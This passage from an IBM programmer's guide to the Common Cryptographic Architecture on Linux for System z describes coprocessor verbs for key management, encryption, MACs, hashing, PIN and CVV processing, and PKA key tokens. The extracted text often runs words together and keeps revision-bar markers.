cryptographic features provide ways to +| solve long-standing barriers to secure key exchange with non-IBM cryptographic systems. +| After anATM is in operation, new keys can be installed as needed, by sending them enciphered under a +| KEK installed previously. This is straightforward in concept, but the cryptographic architecture inATMs is +| often different from that of the host system that is sending the keys, and it is difficult to export the keys in +| a form understood by theATM. For example, cryptographic architectures often enforce key-usage +| restrictions in which a key is bound to data describing limitations on how it can be used (for encrypting +| data, for encrypting keys, for operating on MessageAuthentication Codes (MACs), and so forth). The +| encoding of these restrictions and the method used to bind them to the key itself differs among +| cryptographic architectures, and it is often necessary to translate the format to that understood by the +| target device prior to a key being transmitted. It is difficult to do this without reducing security in the +| system; typically it is done by making it possible to arbitrarily change key-usage restrictions. +| The methods described here provide a mechanism through which the system owner can securely control +| these translations, preventing the majority of attacks that could be mounted by modifying usage +| restrictions. +| Adata structure called a trusted block is defined to facilitate the remote key loading methods. The trusted +| block is the primary vehicle supporting these new methods. See “Trusted blocks” on page 444. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 35 + +Verbs that support Secure Sockets Layer (SSL) +The Secure Sockets Layer (SSL) protocol, developed by Netscape Development Corporation, provides +communications privacy over the Internet. Client/server applications can use the SSLprotocol to provide +secure communications and prevent eavesdropping, tampering, or message forgery. +CCAprovides verbs that support the RSA-encryption and RSA-decryption of PKCS 1.2-formatted +symmetric key data to produce symmetric session keys. These session keys can then be used to establish +an SSLsession between the sender and receiver. The verbs provide SSLsupport: +v PKADecrypt (CSNDPKD) +v PKAEncrypt (CSNDPKE) +Enciphering and deciphering data +Enciphering data protects it from disclosure to people who do not have authority to access it. Using +algorithms that make it difficult and expensive for an unauthorized user to derive the original clear data +within a practical time period assures privacy. +To protect data, CCAcan use the Data Encryption Standard (DES) orAdvanced Encryption Standard +(AES) algorithms to encipher or decipher data or keys. These verbs perform the enciphering and +deciphering functions: +v Decipher (CSNBDEC) +v Encipher (CSNBENC) +v SymmetricAlgorithm Decipher (CSNBSAD) +v SymmetricAlgorithm Encipher (CSNBSAE) +Managing data integrity and message authentication +To ensure the integrity of transmitted messages and stored data, CCAprovides: +v DES-based MessageAuthentication Code (MAC) functions +v Several hashing functions, including Modification Detection Code (MDC), SHA-1, RIPEMD-160 and MD5 +See Chapter10, “Using digital signatures,” on page 359 for an alternate method of message authentication +using digital signatures. +The choice of verb depends on the security requirements of the environment in which you are operating. If +you need to ensure the authenticity of the sender and also the integrity of the data, consider Message +Authentication Code processing. If you need to ensure the integrity of transmitted data in an environment +where it is not possible for the sender and the receiver to share a secret cryptographic key, consider +hashing functions. +Message authentication code processing +The process of verifying the integrity and authenticity of transmitted messages is called message +authentication. Message authentication code (MAC) processing allows you to verify that a message was +not altered or a message was not fraudulently introduced onto the system. You can check that a message +you have received is the same one sent by the message originator. The message itself can be in clear or +encrypted form. The comparison is performed within the cryptographic coprocessor. Because both the +sender and receiver share a secret cryptographic key used in the MAC calculation, the MAC comparison +also ensures the authenticity of the message. +In a similar manner, MACs can be used to ensure the integrity of data stored on the system or on +removable media, such as tape. +36 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CCAkey typing makes it possible to give one party a key that can only be used to generate a MAC, and +to give another party a corresponding key that can only be used to verify the MAC. This ensures that the +second party cannot impersonate the first by generating MACs with their version of the key. +The coprocessor provides support for both single-length and double-length MAC generation and MAC +verification keys. With theANSI X9.9-1 single key algorithm, use the single-length MAC and MACVER +keys. +CCAprovides support for the use of data-encrypting keys in the MAC Generate and MAC Verify verbs, +and also the use of a MAC generation key in the MAC Verify verb. This support permits CCAMAC verbs +to interface more smoothly with non-CCAkey distribution system. +| HMAC codes are computed using the FIPS-198 Keyed-Hash MessageAuthentication Code method. See +| Chapter7, “Verifying data integrity and authenticating messages,” on page 233. +These verbs are used to process MACs: +v MAC Generate (CSNBMGN) +v MAC Verify (CSNBMVR) +Hashing functions +Hashing functions are provided by these verbs: +v MDC Generate (CSNBMDG) +v One-Way Hash (CSNBOWH) +Processing personal identification numbers +The process of validating personal identities in a financial transaction system is called personal +authentication. The personal identification number (PIN) is the basis for verifying the identity of a customer +across the financial industry networks. The financial industry needs functions to generate, translate, and +verify PINs. These functions prevent unauthorized disclosures when organizations handle personal +identification numbers. +The coprocessor supports the following algorithms for generating and verifying personal identification +numbers: +v IBM 3624 +v IBM 3624 PIN offset +v IBM German Bank Pool +v IBM German Bank Pool PIN Offset (GBP-PINO) +v VISAPIN validation value +v Interbank +You can translate PIN blocks from one format to another without the PIN being exposed in cleartext form. +The coprocessor supports the following formats: +v ANSI X9.8 +v ISO formats 0, 1, 2, 3 +v VISAformats 1, 2, 3, 4 +v IBM 4704 Encrypting PINPAD format +v IBM 3624 formats +v IBM 3621 formats +v ECI formats 1, 2, 3 +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 37 + +With the capability to translate personal identification numbers into different PIN block formats, you can +use personal identification numbers on different systems. +Verifying credit card data +The Visa International ServiceAssociation (VISA) and MasterCard International, Incorporated have +specified a cryptographic method to calculate a value that relates to the personal account number (PAN), +the card expiration date, and the service code. The VISAcard-verification value (CVV) and the MasterCard +card-verification code (CVC) can be encoded on either track 1 or track 2 of a magnetic striped card and +are used to detect forged cards. Because most online transactions use track-2, the CCAverbs generate +and verify the CVV1 by the track-2 method. +The CVV Generate verb calculates a 1 - 5-byte value through the DES-encryption of the PAN, the card +expiration date, and the service code using two data-encrypting keys or two MAC keys. The CVV Verify +verb calculates the CVV by the same method, compares it to the CVV supplied by the application (which +reads the credit card's magnetic stripe) in the CVV_value, and issues a return code that indicates whether +the card is authentic. +The following verbs are used to process and verify credit card data: +v Clear PIN Encrypt (CSNBCPE) +v Clear PIN Generate (CSNBPGN) +v Clear PIN GenerateAlternate (CSNBCPA) +v CVV Generate (CSNBCSG) +v CVV Verify (CSNBCSV) +v Encrypted PIN Generate (CSNBEPG) +v Encrypted PIN Translate (CSNBPTR) +v Encrypted PIN Verify (CSNBPVR) +v PIN Change/Unblock (CSNBPCU) +v Transaction Validation (CSNBTRV) +Secure messaging +The following verbs will assist applications in encrypting secret information such as clear keys and PIN +blocks in a secure message. These verbs will execute within the secure boundary of the cryptographic +coprocessor: +v Secure Messaging for Keys (CSNBSKY) +v Secure Messaging for PINs (CSNBSPN) +Trusted Key Entry support +The Trusted Key Entry (TKE) workstation provides a secure method of initializing and administering +cryptographic coprocessors. It is an optional System z feature, but it is mandatory if z/OS and CCAare not +available on your system. Initialization of the coprocessor can be done through CCAfor both the z/OS and +Linux environments, either with or without TKE. +| TKE Version 6.0 or higher is required in order to administer the CEX3C coprocessor features. You can use +| the TKE workstation to load DES master keys, PKAmaster keys, and operational keys in a secure way. +| TKE Version 6.0 and 7.0 can also setAES master keys on the CEX3C coprocessor. +1.TheVISACVVandtheMasterCardCVCrefertothesamevalue.CVVisusedheretomeanbothCVVandCVC. +38 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +You can load keys remotely and for multiple coprocessors, which can be in a single machine or in multiple +machines. The TKE workstation eases the administration for using one coprocessor as a production +machine and as a test machine at the same time, while maintaining security and reliability. +The TKE workstation can be used for enabling and disabling access control points for verbs executed on +the cryptographic coprocessor. SeeAppendixG, “Access control points and verbs,” on page 515 for +additional information. +For complete details about the TKE workstation, see z/OS Cryptographic Services ICSF: Trusted Key +Entry PCIX Workstation User’s Guide. +Typical sequences of CCA verbs +Sample sequences in which the CCAverbs might be called are shown in Table4. +Table4.Combinationsoftheverbs +| Combination A (DATA keys only) Combination B +| +| 1. Random Number Generate 1. Random Number Generate +| 2. Clear Key Import or 2. Any Service +| Multiple Clear Key Import 3. Data Key Export for DATA keys, or +| 4. Data Key Export or Key Export Key Export in the general case +| (optional step) (optional step) +| +| Combination C Combination D +| +| 1. Key Generate (OP form only) 1. Key Generate (OPEX form) +| 2. Any service 2. Any service +| 3. Key Export (optional) +| +| Combination E Combination F +| +| 1. Key Generate (IM form only) 1. Key Generate (IMEX form) +| 2. Key Import 2. Key Import +| 3. Any service 3. Any service +| 4. Key Export (optional) +| +| Combination G Combination H +| +| 1. Key Generate 1. Key Import +| 2. AES or DES Key Record Create 2. AES or DES Key Record Create +| 3. AES or DES Key Record Write 3. AES or DES Key Record Write +| 4. Any service (passing label 4. Any service (passing label +| of the key just generated) of the key just generated) +Notes: +1. Anexampleof“anyservice”isCSNBENC. +2. Thesecombinationsexcludeverbsthatcanbeusedontheirown;forexample,KeyExportorencode,orusing +theKeyGenerateverbtogenerateanexportablekey. +3. Thesecombinationsdonotshowkeycommunication,orthetransmissionofanyoutputfromanCCAverb. +| The key forms are described inAppendixC, “Key forms and types used in the Key Generate verb,” on +| page 459 and “Key Generate (CSNBKGN)” on page 120. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 39 + +Summary of the CCA nodes and resource control verbs +| +Table5 lists the CCAnodes and resource control verbs described in this document. The table also +references the chapter that describes the verb. +Table5.SummaryofCCAnodesandresourcecontrolverbs +Entrypoint Verbname Description Page +Chapter4,“UsingtheCCAnodesandresourcecontrolverbs,”onpage57 +CSUACFQ CryptographicFacilityQuery Retrievesinformationaboutthecoprocessorand 58 +theCCAapplicationprograminthatcoprocessor. +CSUACFV CryptographicFacilityVersion RetrievetheSecurityApplicationProgramInterface 84 +(SAPI)versionandbuilddate. +CSUACRA CryptographicResource AllocatesspecificCCAcoprocessorforusebythe 86 +Allocate threadorprocess,dependingonthescopeofthe +verb. +CSUACRD CryptographicResource De-allocatesaspecificCCAcoprocessorthatis 88 +Deallocate allocatedbythethreadorprocess,dependingon +thescopeoftheverb. +| CSNBKSI KeyStorageInitialization Thisverbinitializesakey-storagefileusingthe 90 +| currentsymmetricorasymmetricmaster-key.The +| initializedkeystoragedoesnotcontainany +| preexistingkeyrecords.Thenameandpathofthe +| keystoragedataandindexfileareestablished +| differentlyineachoperatingenvironment.Notethat +| HMACkeysarenotsupportedforkeystorage. +CSNBMKP MasterKeyProcess Operatesonthethreemaster-keyregisters:new, 93 +current,andold. +Thisverbisusedtoclearthenewandtheold +master-keyregisters,generatearandom +master-keyvalueinthenewmaster-keyregister, +XORaclearvalueasakeypartintothenew +master-keyregister,andsetthemasterkey,which +transfersthecurrentmaster-keytotheold +master-keyregisterandthenewmaster-keytothe +currentmaster-keyregister. +CSUARNT RandomNumberTests InvokestheUSANISTFIPSPUB140-1specified 97 +cryptographicoperationaltests.Thesetests, +selectedbyarule_arraykeyword,consistof +known-answertestsofDES,RSA,andSHA-1 +processesand,forrandomnumbers,monobittest, +pokertest,runstest,andlog-runtest. +Summary of the AES, DES, and HMAC verbs +Hash MessageAuthentication Code (HMAC) support was added in CCARelease 4.1.0.All of the HMAC +verbs and features described in this chapter require CCA4.1.0 in order to run. +Table6 lists theAES, DES, and HMAC verbs described in this document. The table also references the +chapter that describes the verb. +Table6.SummaryofCCAAES,DES,andHMACverbs +Entrypoint Verbname Description Page +Chapter5,“ManagingAESandDEScryptographickeys,”onpage99 +40 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +CSNBCKI ClearKeyImport Importsan8-byteclearDATAkey,enciphersit 100 +underthemasterkey,andplacestheresultintoan +internalkeytoken.Thisverbconvertstheclearkey +intooperationalformasaDATAkey. +CSNBCVG ControlVectorGenerate Buildsacontrolvectorfromkeywordsspecifiedby 102 +thekey_typeandrule_arrayparameters. +CSNBCVT ControlVectorTranslate Changesthecontrolvectorusedtoencipheran 104 +externalDESkey. +CSNBCVE CryptographicVariable EncryptsplaintextusingaCVARENCkeyto 107 +Encipher produceciphertextusingtheCipherBlockChaining +(CBC)method. +CSNBDKX DataKeyExport Re-enciphersaDATAkeyfromencryptionunder 109 +themasterkeytoencryptionunderanexporter +key-encryptingkey,makingitsuitableforexportto +anothersystem. +CSNBDKM DataKeyImport ImportsanencryptedsourceDESsingle-or 111 +double-lengthDATAkeyandcreatesorupdatesa +targetinternalkeytokenwiththemasterkey +encipheredsourcekey. +CSNBDKG DiversifiedKeyGenerate Generatesakeybaseduponthekey-generating 113 +key,theprocessingmethod,andtheparameter +datathatissupplied.Thecontrolvectorofthe +key-generatingkeyalsodeterminesthetypeof +targetkeythatcanbegenerated. +CSNBKEX KeyExport Re-enciphersakeyfromencryptionundera 117 +masterkeyvarianttoencryptionunderthesame +variantofanexporterkey-encryptingkey,makingit +suitableforexporttoanothersystem. +| CSNBKGN KeyGenerate Generatesa64-bit,128-bit,192-bit,or256-bitodd 120 +paritykey,orapairofkeys;andreturnsthemin +encryptedforms(operational,exportable,or +importable).KeyGeneratedoesnotproducekeys +inplaintext. +|||| CSNBKGN2 KeyGenerate2 GenerateseitheroneortwoHMACkeys.Thisverb 128 +| doesnotproducekeysinclearformandallkeys +| arereturnedinencryptedform.Whentwokeysare +| generated,eachkeyhasthesameclearvalue, +| althoughthisclearvalueisnotexposedoutside +| thesecurecryptographicfeature. +| Thisverbreturnsvariable-lengthCCAkeytokens +| andusestheAESKWwrappingmethod. +| OperationalkeyswillbeencryptedundertheAES +| masterkey. +CSNBKIM KeyImport Re-enciphersakeyfromencryptionunderan 133 +importerkey-encryptingkeytoencryptionunder +themasterkey.There-encipheredkeyisinthe +operationalform. +CSNBKPI KeyPartImport Combinestheclearkeypartsofanykeytypeand 136 +returnsthecombinedkeyvalueinaninternalkey +tokenoranupdatetotheCCAkeystoragefile. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 41 + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +|||| CSNBKPI2 KeyPartImport2 CombinestheclearkeypartsofanyHMACkey 139 +| typefromaninternalvariable-lengthsymmetric +| key-token,andreturnsthecombinedkeyvaluein +| aninternalvariable-lengthsymmetrickey-tokenor +| anupdatetotheCCAkeystoragefile. +CSNBKYT KeyTest Generatesorverifies(dependingonkeywordsin 143 +therule_array)asecureverificationpatternfor +keys.Thisverbrequiresthetestedkeytobeinthe +clearorencryptedunderthemasterkey. +|||| CSNBKYT2 KeyTest2 Generatesorverifies(dependingonkeywordsin 147 +| therule_array)asecurecryptographicverification +| patternforkeyscontainedinavariable-length +| symmetrickey-token.Thekeytotestcanbeinthe +| clearorencryptedunderamasterkey.Requires +| thetestedkeytobeintheclearorencrypted +| underthemasterkey. +CSNBKYTX KeyTestExtended ThisverbisessentiallythesameasKeyTest, 150 +exceptforthefollowing: +v Inadditiontooperatingoninternalkeysandkey +parts,thisverbalsooperatesonexternalkeys +andkeyparts. +v Thisverbdoesnotoperateonclearkeys,and +doesnotacceptrule_arraykeywordsCLR-A128, +CLR-A192,CLR-A256,KEY-CLR,and +KEY-CLRD. +CSNBKTB KeyTokenBuild Buildsaninternalorexternaltokenfromthe 155 +suppliedparameters.Youcanusethisverbtobuild +CCAkeytokensforallkeytypesthatCCA +supports.Theresultingtokencanbeusedasinput +totheKeyGenerate,andKeyPartImportverbs. +|||| CSNBKTB2 KeyTokenBuild2 Buildsvariable-lengthinternalorexternalkey 159 +| tokensforallkeytypesthatthecoprocessor +| supports.Thekeytokenisbuiltbasedon +| parametersthatyousupply.Theresultingtoken +| canbeusedasinputtotheKeyGenerate2,and +| KeyPartImport2verbs.Aclearkeytokenbuiltby +| thisverbcanbeusedasinputtotheKeyTest2 +| verb. +| ThisverbsupportsinternalHMACtokens,bothas +| clearkeytokensandasskeletontokenscontaining +| nokey. +CSNBKTC KeyTokenChange Re-enciphersaDESkeyfromencryptionunderthe 163 +oldmasterkeytoencryptionunderthecurrent +masterkey,andtoupdatethekeysininternalDES +key-tokens. +|||| CSNBKTC2 KeyTokenChange2 Re-enciphersavariable-lengthHMACkeyfrom 166 +| encryptionundertheoldmasterkeytoencryption +| underthecurrentmasterkey.Thisverbalso +| updatesthekeysininternalHMACkey-tokens. +CSNBKTP KeyTokenParse Disassemblesakeytokenintoseparatepiecesof 169 +information.Thisverbcandisassembleanexternal +key-tokenoraninternalkey-tokeninapplication +storage. +42 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +CSNBKTR KeyTranslate Usesonekey-encryptingkeytodecipheraninput 173 +keyandthenenciphersthiskeyusinganother +key-encryptingkeywithinthesecureenvironment. +|||| CSNBKTR2 KeyTranslate2 Usesonekey-encryptingkeytodecipheraninput 175 +| keyandthenenciphersthiskeyusinganother +| key-encryptingkeywithinthesecureenvironment. +| ThisverbdiffersfromtheKeyTranslateverbin +| thatKeyTranslate2canprocessbothfixed-length +| andvariable-lengthsymmetrickeytokens. +CSNBCKM MultipleClearKeyImport Importsasingle-length,double-length,or 179 +triple-lengthclearDATAkeythatisusedto +encipherordecipherdata.Itacceptsaclearkey +andenciphersthekeyunderthehostmasterkey, +returninganencryptedDATAkeyinoperational +forminaninternalkeytoken. +CSNDPKD PKADecrypt UsesanRSAprivatekeytodecryptthe 182 +RSA-encryptedkeyvalueandreturntheclearkey +valuetotheapplication. +CSNDPKE PKAEncrypt EncryptsasuppliedclearkeyvalueunderanRSA 185 +publickey.Thesuppliedkeycanbeformatted +usingthePKCS1.2orZERO-PADmethodsprior +toencryption. +CSNBPEX ProhibitExport ModifiesthecontrolvectorofaCCAkeytokenso 188 +thatthekeycannotbeexported.Thisverb +operatesonlyoninternalkeytokens. +CSNBPEXX ProhibitExportExtended ModifiesanexternalDESkey-tokensothatthe 189 +keycannolongerbeexportedafterithasbeen +imported.Thisverboperatesonlyoninternalkey +tokens. +CSNBRNG RandomNumberGenerate Generatesan8-bytecryptographic-qualityrandom 191 +numbersuitableforuseasanencryptionkeyorfor +otherpurposes.Theoutputcanbespecifiedin +threeformsofparity:RANDOM,ODD,andEVEN. +CSNBRNGL RandomNumberGenerate Generatesacryptographic-qualityrandomnumber 193 +Long suitableforuseasanencryptionkeyorforother +purposes,rangingfrom1-8192bytesinlength. +Theoutputcanbespecifiedinthreeformsof +parity:RANDOM,ODD,andEVEN. +|||| CSNBRKA RestrictKeyAttribute Modifiesanoperationalvariable-lengthkeysothat 195 +| itcannotbeexported. +|||| CSNDSYX SymmetricKeyExport Transferanapplication-suppliedsymmetrickey(a 198 +| DATAkey)fromencryptionundertheAES,DESor +| HMACmasterkeytoencryptionunderan +| application-suppliedRSApublickey.The +| application-suppliedDATAkeymustbeanAES, +| DESorHMACinternalkeytoken,orthelabelof +| anAESorDESkeytokenintheCCAkeystorage +| file.TheSymmetricKeyImportandSymmetricKey +| Import2verbcanimportthePKA-encryptedkey +| formatthereceivingnode.SupportforHMACkey +| wasaddedbeginningwithCCA4.1.0. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 43 + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +|||| CSNDSYG SymmetricKeyGenerate Generateasymmetrickey(aDATAkey)andreturn 201 +| thekeyintwoforms:DES-encryptedand +| encryptedunderanRSApublickey.The +| DES-encryptedkeycanbeaninternaltoken +| encryptedunderahostDESmasterkey,oran +| externalformencryptedunderaKEK.(Youcan +| usetheSymmetricKeyImportverbtoimportthe +| PKA-encryptedform.) +|||| CSNDSYI SymmetricKeyImport ImportasymmetricAESorDESDATAkey 205 +| encipheredunderanRSApublickeyinto +| operationalformencipheredunderaDESmaster +| key. +|||| CSNDSYI2 SymmetricKeyImport2 UsethisverbtoimportanHMACkeythathas 208 +| beenpreviouslyformattedandencipheredunder +| anRSApublickeybytheSymmetricKeyExport +| verb.TheformattedandRSA-encipheredkeyis +| containedinanexternalvariable-lengthsymmetric +| key-token.Thekeyisdecipheredusingthe +| associatedRSAprivate-key.TherecoveredHMAC +| keyisre-encipheredundertheAESmaster-key. +| There-encipheredkeyisthenreturnedinan +| internalvariable-lengthsymmetrickey-token.The +| keyalgorithmforthisverbisHMAC. +Chapter6,“Protectingdata,”onpage211 +CSNBDEC Decipher Deciphersdatausingcipherblockchainingmode 213 +ofDES.Theresultiscalledplaintext. +CSNBENC Encipher Enciphersdatausingthecipherblockchaining 217 +modeofDES.Theresultiscalledciphertext. +CSNBSAD SymmetricAlgorithmDecipher DeciphersdatausingtheAEScipherblock 221 +chainingmode. +CSNBSAE SymmetricAlgorithmEncipher EnciphersdatausingtheAEScipherblock 226 +chainingmode +Chapter7,“Verifyingdataintegrityandauthenticatingmessages,”onpage233 +CSNBHMG HMACGenerate Generatesakeyedhashmessageauthentication 235 +code(HMAC)forthetextstringprovidedasinput. +SeeChapter7,“Verifyingdataintegrityand +authenticatingmessages,”onpage233. +CSNBHMV HMACVerify Verifiesakeyedhashmessageauthentication 238 +code(HMAC)forthetextstringprovidedasinput. +SeeChapter7,“Verifyingdataintegrityand +authenticatingmessages,”onpage233. +CSNBMGN MACGenerate Generatesa4,6,or8-byteMessage 241 +AuthenticationCode(MAC)foratextstringthat +theapplicationprogramsupplies.TheMACis +computedusingeithertheANSIX9.9-1algorithm +ortheANSIX9.19optionaldoublekeyalgorithm +andpaddingcouldbeappliedaccordingtothe +EMVspecification. +44 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +CSNBMVR MACVerify Verifiesa4,6,or8-byteMessageAuthentication 245 +Code(MAC)foratextstringthattheapplication +programsupplies.TheMACiscomputedusing +eithertheANSIX9.9-1algorithmortheANSIX9.19 +optionaldoublekeyalgorithmandpaddingcould +beappliedaccordingtotheEMVspecification.The +computedMACiscomparedwithauser-supplied +MAC. +CSNBMDG MDCGenerate Createsa128-bithashvalue(Modification 249 +DetectionCode)onadatastringwhoseintegrity +youintendtoconfirm. +CSNBOWH One-WayHash Generatesaone-wayhashonspecifiedtext. 258 +Chapter9,“Financialservices,”onpage303 +CSNBCPE ClearPINEncrypt FormatsaPINintoaPINblockformatand 312 +encryptstheresults.Youcanalsousethisverbto +createanencryptedPINblockfortransmission. +WiththeRANDOMkeyword,youcanhavethe +verbgeneraterandomPINnumbers. +CSNBPGN ClearPINGenerate Generatesaclearpersonalidentificationnumber 315 +(PIN),aPINverificationvalue(PVV),oranoffset +usingoneofthefollowingalgorithms: +v IBM3624(IBM-PINorIBM-PINO) +v IBMGermanBankPool(GBP-PINor +GBP-PINO) +v VISAPINvalidationvalue(VISA-PVV) +v InterbankPIN(INBK-PIN) +CSNBCPA ClearPINGenerateAlternate GeneratesaclearVISAPINvalidationvalue(PVV) 318 +fromaninputencryptedPINblock.ThePINblock +mighthavebeenencryptedundereitheraninput +oroutputPINencryptingkey.TheIBM-PINO +algorithmissupportedtoproducea3624offset +fromacustomerselectedencryptedPIN.ThePIN +blockmustbeencryptedundereitheraninput +PIN-encryptingkey(IPINENC)oroutput +PIN-encryptingkey(OPINENC). +CSNBCSG CVVGenerate GeneratesaVISACardVerificationValue(CVV)or 322 +aMasterCardCardVerificationCode(CVC)as +definedfortrack2. +CSNBCSV CVVVerify VerifiesaVISACardVerificationValue(CVV)ora 325 +MasterCardCardVerificationCode(CVC)as +definedfortrack2. +CSNBEPG EncryptedPINGenerate GeneratesandformatsaPINandencryptsthePIN 328 +block. +CSNBPTR EncryptedPINTranslate Re-enciphersaPINblockfromonePIN-encrypting 332 +keytoanotherand,optionally,changesthePIN +blockformat.UKPTkeywordsaresupported.You +mustidentifytheinputPIN-encryptingkeythat +originallyenciphersthePIN.Youalsoneedto +specifytheoutputPIN-encryptingkeythatyou +wanttheverbtousetoencipherthePIN.Ifyou +wanttochangethePINblockformat,specifya +differentoutputPINblockformatfromtheinput +PINblockformat. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 45 + +Table6.SummaryofCCAAES,DES,andHMACverbs (continued) +Entrypoint Verbname Description Page +CSNBPVR EncryptedPINVerify VerifiesasuppliedPINusingoneofthefollowing 338 +algorithms: +v IBM3624(IBM-PINorIBM-PINO) +v IBMGermanBankPool(GBP-PINor +GBP-PINO) +v VISAPINvalidationvalue(VISA-PVV) +v InterbankPIN(INBK-PIN) +UKPTkeywordsaresupported. +CSNBPCU PINChange/Unblock SupportsthePINchangealgorithmsspecifiedin 342 +theVISAIntegratedCircuitCardSpecification; +availableonlyonanIBMz890orIBMz990with +May2004orlaterversionofLicensedInternal +Code(LIC). +CSNBSKY SecureMessagingforKeys Encryptsatextblock,includingaclearkeyvalue 348 +decryptedfromaninternalorexternalDEStoken. +CSNBSPN SecureMessagingforPINs Encryptsatextblock,includingaclearPINblock 351 +recoveredfromanencryptedPINblock. +CSNBTRV TransactionValidation SupportsthegenerationandvalidationofAmerican 355 +Expresscardsecuritycodes;availableonlyonan +IBMz890orIBMz990withMay2004orlater +versionofLicensedInternalCode(LIC). +46 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 3. Introducing PKA cryptography and using PKA +verbs +The preceding chapters focused onAES or DES cryptography or secret-key cryptography. This +cryptography is symmetric (senders and receivers use the same key, which must be exchanged securely +in advance, to encipher and decipher data). +Public key cryptography does not require exchanging a secret key. It is asymmetric (the sender and +receiver each have a pair of keys, a public key and a different but corresponding private key). +| You can use PKAsupport to exchange symmetric algorithm secret keys securely, and to compute digital +| signatures for authenticating messages to users. +PKA key algorithms +| +| Public key cryptography uses a key pair consisting of a public key and a private key. The PKApublic key +| uses one of the following algorithms: +| Rivest-Shamir-Adleman (RSA) +| The RSAalgorithm is the most widely used and accepted of the public key algorithms. It uses three +| quantities to encrypt and decrypt text: a public exponent (PU), a private exponent (PR), and a +| modulus (M). Given these three and some cleartext data, the algorithm generates ciphertext as +| follows: +| ciphertext = cleartextPU (modulo M) +| Similarly, the following operation recovers cleartext from ciphertext: +| cleartext = ciphertextPR (modulo M) +| Elliptic Curve Digital SignatureAlgorithm (ECDSA) +| The ECDSAalgorithm uses elliptic curve cryptography (an encryption system based on the properties +| of elliptic curves) to provide a variant of the Digital SignatureAlgorithm. +PKA master keys +| On the PCI-X Cryptographic Coprocessor, CEX2C, or CEX3C, PKAkeys are protected by the +| Asymmetric-Keys Master Key (ASYM-MK). TheASYM-MK is a triple-length DES key used to protect PKA +| private keys. On the PCI-X Cryptographic Coprocessor, CEX2C and CEX3C, theASYM-MK protects RSA +| private keys. +| Starting with the IBM zEnterprise 196 configured with a CEX3C, there are two PKAmaster keys: the +| ASYM-MK mentioned above, and the 256-bitAES PKAMaster Key (APKA-MK), used to protect ECC +| private keys stored in ECC key tokens. +| In order for PKAverbs to function on the processor, the hash pattern of theASYM-MK must match the +| hash pattern of the SYM-MK on the Cryptographic Coprocessor Feature. The administrator installs the +| PKAmaster keys on the Cryptographic Coprocessor Feature and theASYM-MK on the coprocessor by +| using either the pass phrase initialization routine, the Clear Master Key Entry panels, or the optional +| Trusted Key Entry (TKE) workstation. +Operational private keys +| Operational private keys are protected under two layers of DES encryption. They are encrypted under an +| Object Protection Key (OPK) that in turn is encrypted under theASYM-MK. You dynamically generate the +| OPK for each private key at import time or when the private key is generated on a CEX2C or CEX3C. +| CCAprovides a public key storage file for the storage of application PKAkeys.Although you cannot +©CopyrightIBMCorp.2007,2011 47 + +| change PKAmaster keys dynamically, the PKAKey Token Change verb can be run to change a private +| PKAtoken (RSAor ECC) from encryption under the oldASYM-MK (orAPKA-MK) to encryption under the +| currentASYM-MK (orAPKA-MK). This verb requires a CEX2C or CEX3C. +PKA verbs +| The CEX2C provides RSAdigital signature functions, key management and key generation functions, DES +| key distribution functions, and data encryption functions, and application programming interfaces to these +| functions through verbs. +| The CEX3C running on the IBM System z10 model GA3 provides RSAand ECC digital signature +| functions, key management and key generation functions, DES key distribution functions, and data +| encryption functions, and application programming interfaces to these functions through verbs. +Verbs supporting digital signatures +CCAprovides the following verbs that support digital signatures: +v Digital Signature Generate (CSNDDSG) +v Digital Signature Verify (CSNDDSV) +Verbs for PKA key management +CCAprovides the following verbs for PKAkey management: +v PKAKey Generate (CSNDPKG) +v PKAKey Import (CSNDPKI) +v PKAKey Token Build (CSNDPKB) +v PKAKey Token Change (CSNDKTC) +v PKAKey Translate (CSNDPKT) +v PKAPublic Key Extract (CSNDPKX) +v Remote Key Export (CSNDRKX) +v Trusted Block Create (CSNDTBC) +PKA key tokens +| PKAkey tokens contain RSAor ECC private or public keys. PKAtokens are variable length because they +| contain either RSAor ECC key values, which are variable in length. Consequently, length parameters +| precede all PKAtoken parameters. The maximum allowed size is 3500 bytes. PKAkey tokens consist of a +| token header, any required sections, and any optional sections. Optional sections depend on the token +| type. PKAkey tokens can be public or private, and private key tokens can be internal or external. +| Therefore, there are three basic types of tokens, each of which can contain either RSAor ECC +| information: +| v Apublic key token +| v Aprivate external key token +| v Aprivate internal key token +| Public key tokens contain only the public key. Private key tokens contain the public and private key pair. +Table7 summarizes the sections in each type of token. +Table7.SummaryofPKAkeytokensections +Section Publicexternalkey Privateexternalkey Privateinternalkey +token token token +Header X X X +48 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table7.SummaryofPKAkeytokensections (continued) +Section Publicexternalkey Privateexternalkey Privateinternalkey +token token token +|||| RSAorECCprivatekeyinformation X X +|||| RSAorECCpublickeyinformation X X X +Keyname(optional) X X +Internalinformation X +As with DES key tokens, the first byte of a PKAkey token contains the token identifier which indicates the +type of token. +Afirst byte of X'1E' indicates an external token with a cleartext public key and optionally a private key that +is either in cleartext or enciphered by a transport key-encrypting key.An external key token is in importable +key form. It can be sent on the link. +Afirst byte of X'1F' indicates an internal token with a cleartext public key and a private key that is +enciphered by the PKAmaster key and ready for internal use.An internal key token is in operational key +form.APKAprivate key token must be in operational form for the coprocessor 